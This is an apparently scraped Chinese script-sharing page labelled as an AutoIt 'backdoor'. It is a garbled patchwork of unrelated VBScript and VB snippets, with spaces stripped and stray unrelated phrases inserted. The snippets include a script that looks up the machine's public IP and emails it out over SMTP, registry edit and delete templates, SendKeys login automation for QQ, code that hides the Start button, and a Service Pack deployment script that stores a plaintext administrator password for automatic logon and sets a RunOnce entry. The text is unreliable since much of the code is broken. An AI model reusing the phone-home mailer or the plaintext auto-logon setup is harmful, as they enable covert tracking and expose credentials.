autoit脚本后门以行读取文件

发布时间:2020-10-08 来源:脚本之家 点击:

  

  点这里下载原程序文件
''getIP
set http=createobject("Microsoft.XMLHTTP")
ipp=""
http.open "get",ipp,false
http.send
ss=bytes2BSTR(Http.responsebody)
intStrA=InStr(1,ss,"[",1)+1
sss=mid(ss,intStrA)
intStrB=InStr(1,sss,"]",1)-1
ss=mid(ss,intStrA,intStrB)
'wscript.echo ss

Function bytes2BSTR(vIn)
strReturn=""
For i=1 To LenB(vIn)
ThisCharCode=AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn=strReturn & Chr(ThisCharCode)
Else
NextCharCode=AscB(MidB(vIn,i+1,1))
strReturn=strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i=i + 1
End If
Next
bytes2BSTR=strReturn
End Function

''SendEmail
NameSpace=""
Set Email=CreateObject("CDO.Message")
Email.From="发送邮箱"
Email.To="接收邮箱"
Email.Subject="主题"
Email.Textbody=ss&date() 'ss为获取到的ip
'Email.AddAttachment "附件的路径例如:C:\foo.zip"
With Email.Configuration.Fields
.Item(NameSpace&"sendusing")=2
.Item(NameSpace&"smtpserver")="smtp.163.com" 'smtp服务器地址
.Item(NameSpace&"smtpserverport")=25
.Item(NameSpace&"smtpauthenticate")=1
.Item(NameSpace&"sendusername")="账户名,发送邮箱的"
.Item(NameSpace&"sendpassword")="密码"
.Update
End With
Email.Send

微电影的脚本样式
DimFileName,Find,ReplaceWith,FileContents,dFileContents
Find=WScript.Arguments(0)
ReplaceWith=WScript.Arguments(1)
FileName=WScript.Arguments(2)

'读取文件
FileContents=GetFile(FileName)

'用“替换内容”替换文件中所有“查找内容”
dFileContents=replace(FileContents,Find,ReplaceWith,1,-1,1)

'比较源文件和替换后的文件
ifdFileContents<>FileContentsThen
'保存替换后的文件
WriteFileFileName,dFileContents

Wscript.Echo"Replacedone."
IfLen(ReplaceWith)<>Len(Find)Then
'计算替换总数
Wscript.Echo_
((Len(dFileContents)-Len(FileContents))/(Len(ReplaceWith)-Len(Find)))&_
"replacements."
EndIf
Else
Wscript.Echo"SearchedstringNotInthesourcefile"
EndIf

'读取文件
functionGetFile(FileName)
IfFileName<>""Then
DimFS,FileStream
SetFS=CreateObject("Scripting.FileSystemObject")
onerrorresumeNext
SetFileStream=FS.OpenTextFile(FileName)
GetFile=FileStream.ReadAll
EndIf
EndFunction

'写文件
functionWriteFile(FileName,Contents)
DimOutStream,FS

onerrorresumeNext
SetFS=CreateObject("Scripting.FileSystemObject")
SetOutStream=FS.OpenTextFile(FileName,2,True)
OutStream.WriteContents
EndFunction
1、在VB4.0中打开一个新工程文件,在FORM1上添加一个命令按钮Command1



注册表的修改/读取/删除/创建
Setwso=CreateObject("WScript.Shell")'声明
wso.RegWrite"%Path%"'创建子键
wso.RegWrite"%Path%","%Value%"'修改"默认"键值
wso.RegWrite"%Path%",%Value%,%RegType%'修改特定类型的键值
'(字符串值REG_SZ可扩充字符串值REG_EXPAND_SZDWORD值REG_DWORD二进制值REG_BINARY)

SetWSHShell=Wscript.CreateObject("Wscript.Shell")
WSHShell.RegRead(%Path%)'读取注册表子键或键值(一般用于判断某一事件是否执行)

Setwso=CreateObject("WScript.Shell")
wso.RegDelete"%Path%"'删除子键或键值
'(根键缩写HKEY_CLASSES_ROOTHKCRHKEY_CURRENT_USERHKCUHKEY_LOCAL_MACHINEHKLM,其余无)


程序代码

Setwso=CreateObject("Wscript.Shell")
wso.RegWrite"HKLMSOFTWAREMicrosftWindowsNT#1"
wso.RegWrite"HKLMSOFTWAREMicrosftWindowsNT#1","0"
wso.RegWrite"HKLMSOFTWAREMicrosftWindowsNT#1#2",0,REG_BINARY
wso.RegDelete"HKLMSOFTWAREMicrosftWindowsNT#1"
Wscript.quit


文件的复制/删除/创建/简单的写入
Setfso=Wscript.CreateObject("Scripting.FileSystemObject")'声明
Setf=fso.CreateTextFile("%PATH%")'创建文件,其中f可任意,包含缩略名
f.WriteLine("VBS")'写文件内容,该命令功能太简单,目前看来只能用于TXT文件
f.Close
setc=fso.getfile("%path%")'拷贝某文件
c.copy("%PATH2%")'拷贝文件到指定地点
fso.deletefile("%PATH%")'删除文件
Wscript.quit


程序代码

Setfso=Wscript.CreateObject("Scripting.FileSystemObject")
Setf=fso.CreateTextFile("C:Sample.txt")
WriteLine("VBS")
f.close
sete=fso.getfile(C:Sample.txt)
e.copy("D:Sample.txt")
fso.deletefile(C:Sample.txt)
Wscript.quit


向应用程序输出简单的连串指令
dimprogram1'声明变量program1
program1="%Path%"'应用程序路径
setwshshell=createobject("wscript.shell")'声明饮用函数
setoexec=wshshell.exec(program1)'运行程序
wscript.sleep2000'(该行命令未知作用.估计是设定延迟,请高手指点)
wshshell.appactivate"%WindowsName%"'激活运用程序窗口
wshshell.sendkeys"+{%KeyBoardName%}"'第一次输出键盘按键指令前要加+
wshshell.sendkeys"555555"'在程序输入栏中输入运用该系列命令须首先确定程序可以实施连串的键盘操作,这在QQ登录中最适用,如下例'*ModuleName:Start_Module
'*ModuleFilename:Start.bas
'*********************************************************
'*Comments:Show/Hidethestartbutton
'********************************************************
PrivateDeclareFunctionFindWindowLib"user32"Alias"FindWindowA"(ByVallpClassNameAsString,ByVallpWindowNameAsString)AsLong

PrivateDeclareFunctionFindWindowExLib"user32"Alias"FindWindowExA"(ByValhWnd1AsLong,ByValhWnd2AsLong,ByVallpsz1AsString,ByVallpsz2AsString)AsLong

PrivateDeclareFunctionShowWindowLib"user32"(ByValhwndAsLong,ByValnCmdShowAsLong)AsLong

PublicFunctionhideStartButton()
'ThisFunctionHidestheStartButton'
OurParent&=FindWindow("Shell_TrayWnd","")
OurHandle&=FindWindowEx(OurParent&,0,"Button",vbNullString)
ShowWindowOurHandle&,0
EndFunction

PublicFunctionshowStartButton()
'ThisFunctionShowstheStartButton'
OurParent&=FindWindow("Shell_TrayWnd","")
OurHandle&=FindWindowEx(OurParent&,0,"Button",vbNullString)

ShowWindowOurHandle&,5
EndFunction->

#3语句:“WScript.sleep 8000”;其中8000标记延时的时间,以毫秒为单位8000表示延时8秒;
InStrRev返回一个字符串在另一个字符串出现的位置,充分利用它可以轻而易举地截取所要的内容


'******************************************************************************
'install.vbs
'Author:PeterCostantini,theMicrosoftScriptingGuys
'Date:9/1/04
'Mustbedeployedtoaclientandlaunchedremotelybyscenario1.vbs.
'Assumesthatrunonce.vbsisinsamedirectoryasscript.
'AssumesthatWindowsXPServicePack2setupprogramisonaremoteserver
'andrunonce.vbsareinsamedirectoryasscript.
'1.RunsServicePack2setupprogramfromremoteservertoinstall
'WindowsXPServicePack2.Thiscouldtakeoneortwohours.
'2.ConfigurestheAutoAdminandRunOnceregistrysettingsnecessary
'torunrunonce.vbs.
'3.Logsresultstotextfile,<computername>-sp2-instlog.txtandcopies
'thefilebacktoadminworkstation.
'4.ForcesarebootofthelocalmachinesothattheAutoAdminandRunOnce
'registrysettingstakeeffect.
'******************************************************************************

OnErrorResumeNext

'Initializeglobalconstantsandvariables.
ConstFOR_APPENDING=8
g_strLocalFolder="c:\temp-ac"
'Changenameofcomputertoactualadministrativeworkstationorlocal
'pathtowhichlogshouldbecopied.
g_strRemoteFolder="\\<adminwkstn>\c$\temp-ac"

'Getcomputername.
g_strComputer=GetComputerName
g_strLogFile=g_strComputer&"-sp2-instlog.txt"

'Createlogfile.
SetobjFSO=CreateObject("Scripting.FileSystemObject")
SetobjTextStream=objFSO.OpenTextFile(g_strLogFile,FOR_APPENDING,True)
objTextStream.WriteLine"WindowsXPServicePack2"&_
"InstallationandConfigurationLog:Phase1"
objTextStream.WriteLineNow
objTextStream.WriteLineg_strComputer
objTextStream.WriteLineString(Len(g_strComputer),"-")

'Handlelogicofcallingfunctionsandsub-routinestoinstallServicePack2
'andconfigureAutoAdministration.
blnInstallSP=InstallSP
IfblnInstallSP=FalseThen
CopyLog
WScript.Quit
EndIf
blnAutoAdmin=ConfigAutoAdmin
IfblnAutoAdmin=FalseThen
CopyLog
WScript.Quit
EndIf
Reboot

'******************************************************************************

FunctionGetComputerName

SetobjWMIService=GetObject("winmgmts:{impersonationLevel=impersonate}!\\."_
&"\root\cimv2")
SetcolSystems=objWMIService.ExecQuery("SELECT*FROMWin32_ComputerSystem")
ForEachobjSytemIncolSystems
GetComputerName=objSytem.Name
Next

EndFunction

'******************************************************************************

FunctionInstallSP

'EditthislinetoincludetheserverandsharenamewheretheWindowsXP
'ServicePack2setupprogramislocated.
strInstallPath="\\servername\xpsp2\WindowsXP-KB835935-SP2-ENU.exe"&_
"/quiet/norestart/o"

SetWshShell=CreateObject("Wscript.Shell")
SetobjExec=WshShell.Exec(strInstallPath)
'Thiscouldtakeoneortwohours.
objTextStream.WriteLine"Installationstarted..."
IfErr=0Then
'LoopuntilExecisfinished-Status=1.
DoWhileobjExec.Status=0
'Pausefor10secondsbeforechecking.
'Toreducenetworktraffic,makeintervallonger.
WScript.Sleep10000
Loop
objTextStream.WriteLine"ServicePack2installationcompleted."
InstallSP=True
Else
objTextStream.WriteLine"UnabletoinstallServicePack2."&VbCrLf&_
"ErrorconnectingtoServicePack2onserver."&VbCrLf&_
"Errornumber:"&Err.Number&VbCrLf&_
"Errorsource:"&Err.Source&VbCrLf&_
"Errordescription:"&Err.Description
InstallSP=False
EndIf
Err.Clear

EndFunction

'******************************************************************************

FunctionConfigAutoAdmin

ConstHKEY_LOCAL_MACHINE=&H80000002
strKeyPath1="SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon"
strKeyPath2="SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strDefaultUserName="Administrator"
strDefaultPassword="P@ssw0rd"
strDefaultDomainName="Contoso"
intAutoAdminLogon=1
strRunOnceEntry="MyScript"
strRunoncePath=g_strLocalFolder&"\runonce.vbs"

SetobjReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\"&_
g_strComputer&"\root\default:StdRegProv")

'SetstrDefaultUserNametouserwithAdministratorcredentials.
intRet1=objReg.SetStringValue(HKEY_LOCAL_MACHINE,strKeyPath1,_
"DefaultUserName",strDefaultUserName)
IfintRet1<>0Then
objTextStream.WriteLine"Error:DefaultUserNamenotconfigured."
EndIf

'SetstrDefaultPasswordtopasswordofdefaultusername.
intRet2=objReg.SetStringValue(HKEY_LOCAL_MACHINE,strKeyPath1,_
"DefaultPassword",strDefaultPassword)
IfintRet2<>0Then
objTextStream.WriteLine"Error:DefaultPasswordnotconfigured."
EndIf

'Uncommentnext5linesandeditlastparameterifdefaultdomain
'forthecredentialsisdifferentfromthatalreadyset.
'intRet3=objReg.SetStringValue(HKEY_LOCAL_MACHINE,strKeyPath1,_
'"DefaultDomainName",strDefaultDomainName)
'IfintRet3<>0Then
'objTextStream.WriteLine"Error:DefaultDomainNamenotconfigured."
'EndIf

'TurnonAutoAdminLogon
intRet4=objReg.SetStringValue(HKEY_LOCAL_MACHINE,strKeyPath1,_
"AutoAdminLogon","1")
IfintRet4<>0Then
objTextStream.WriteLine"Error:AutoAdminLogonnotconfigured."
EndIf

'AddMyScriptentrytoRunOncesubkey.
intRet5=objReg.SetStringValue(HKEY_LOCAL_MACHINE,strKeyPath2,_
strRunOnceEntry,strRunoncePath)
IfintRet5<>0Then
objTextStream.WriteLine"Error:MyScriptRunOnceentrynotconfigured."
EndIf

'Checkthatallregistrywriteoperationssucceeded.
If(intRet1+intRet2+intRet3+intRet4+intRet5)=0Then
objTextStream.WriteLine"AutoAdminLogonandRunOnceconfigured."
ConfigAutoAdmin=True
Else
objTextStream.WriteLine"Error:AutoAdminLogonandRunOncenotfully"&_
"configured."
ConfigAutoAdmin=False
EndIf

EndFunction

'******************************************************************************

SubReboot

ConstFORCED_REBOOT=6
SetobjWMIService=GetObject("winmgmts:{impersonationLevel=impersonate,"&_
"(Shutdown)}!\"&g_strComputer&"\root\cimv2")
SetcolOSes=objWMIService.ExecQuery("SELECT*FROMWin32_OperatingSystem")
objTextStream.WriteLine"Attemptingtoreboot..."
CopyLog
ForEachobjOSIncolOSes'OnlyoneobjOSincollection
intReturn=objOS.Win32Shutdown(FORCED_REBOOT)
IfintReturn<>0Then
SetobjTextStream=objFSO.OpenTextFile(g_strLogFile,FOR_APPENDING,True)
objTextStream.WriteLineNow
objTextStream.WriteLine"Error:Unabletoreboot."&VbCrLf&_
"Returncode:"&intReturn
CopyLog
EndIf
Next

EndSub

'******************************************************************************

SubCopyLog

'Closetextfile.
objTextStream.WriteLine"Closinglogandattemptingtocopyfileto"&_
"administrativeworkstation."
objTextStream.WriteLine
objTextStream.WriteLineString(80,"-")
objTextStream.WriteLine
objTextStream.Close

'Copylog.
IfNotobjFSO.FolderExists(g_strRemoteFolder)Then
objFSO.CreateFolder(g_strRemoteFolder)
IfErr<>0Then
Err.Clear
ExitSub
EndIf
EndIf
objFSO.CopyFileg_strLogFile,g_strRemoteFolder&""

EndSub
康乐要安装多久

VB在内部使用最简单、最可能的数据类型保存符号数值,这意味着最通常的数字类型-比如0或者1-都按照Integer类型存储Set fs=CreateObject("Scripting.FileSystemObject")

网站地图 | Tag标签 | RSS订阅
Copyright © 2012-2019 脚本之家 All Rights Reserved
脚本之家  渝ICP备13030612号